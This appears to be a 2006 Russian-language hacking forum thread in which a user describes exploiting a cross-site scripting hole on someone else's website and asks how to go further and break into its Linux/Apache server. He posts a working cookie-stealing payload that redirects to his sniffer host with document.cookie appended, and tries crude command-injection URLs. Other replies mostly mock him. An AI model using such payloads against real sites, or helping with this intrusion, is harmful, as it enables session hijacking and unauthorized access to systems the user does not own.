Чаты Зашол в тупик при взломе

Discussion in 'Веб-уязвимости' started by Adio, 5 Jun 2006.

  1. Adio

    Adio Elder - Старейшина

    Joined:
    23 May 2005
    Messages:
    1,646
    Likes Received:
    148
    Reputations:
    18
    У меня тут такая проблема нашол сайт где можно произвести атаку с JavaScript я вставляю javas code
    типа <script>document.location='http://antichat.org/s/sniff.gif?'+document.cookie</script>

    Оно отсылает cookies на мой сниффер даже когда я просматриваю ту страничку куда я вставил код там есть мой java script code но оно там не сохраняеться т.е после второго захода кода нет я так понял оно через cookies xss работает.. вот пытался сдеать еще
    так
    <script>document.location='http://myname.narod.ru/get.txt&c=ls%20-l'</script> мне потом пишет что страница не найдена 404. делаю я без линукс каманд
    <script>document.location='http://myname.narod.ru/get.txt</script>
    выполнякм мой код тоесть в фрейме нажимаю source html вижу свой get.txt так же и с gif файлами...
    Так вот что можно замутить с такой штукой стоит Lnix и apache помойму все на perl так вот нужо пробраться еа сервер я так понял только через cookie подделывать и все..? просто я не супер спец в этих делах но так получилось надо очень..
     
    1 person likes this.
  2. Elekt

    Elekt Banned

    Joined:
    5 Dec 2005
    Messages:
    944
    Likes Received:
    427
    Reputations:
    508
  3. .Slip

    .Slip Elder - Старейшина

    Joined:
    16 Jan 2006
    Messages:
    1,571
    Likes Received:
    977
    Reputations:
    783
    Я плакалЪ...
     
  4. Adio

    Adio Elder - Старейшина

    Joined:
    23 May 2005
    Messages:
    1,646
    Likes Received:
    148
    Reputations:
    18
    Понятно значит у меня пасивная Xss атака только на момент сессии )) При обновление все по местам и не каких Xss гг))) А жаль такой сайтик....